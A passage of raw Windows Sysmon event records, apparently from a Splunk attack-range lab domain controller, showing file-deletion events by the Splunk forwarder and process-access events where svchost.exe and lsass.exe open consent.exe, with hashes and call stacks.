Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54232917C81809038076871AC4EECFBD,SHA256=6F33D1E3370E914A1C26A9B0C7EC255171A42B055EEAA205064FBED16A154AB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.494{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30EE21E10B528C07C4192DF3FCDD9BEA,SHA256=6D868FF03F1B2B34E56EEDCB949824826C5143DCCD1A6A93CBA6CE40C8822C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E3E5F901A6BA5E650BE303975857DCE,SHA256=1A6AD4C28A898ACE9A199452E53817849623A5F9D9B0841386A0D1236A049CC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E5911AAFFBFF11A73F39A1120181F14,SHA256=EA3FC8E5D688B1B12FDBCA8A1A3BE3F00752A38DCB4D2F988E1135CA0F7C6144,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.145{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.145{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.144{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.143{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 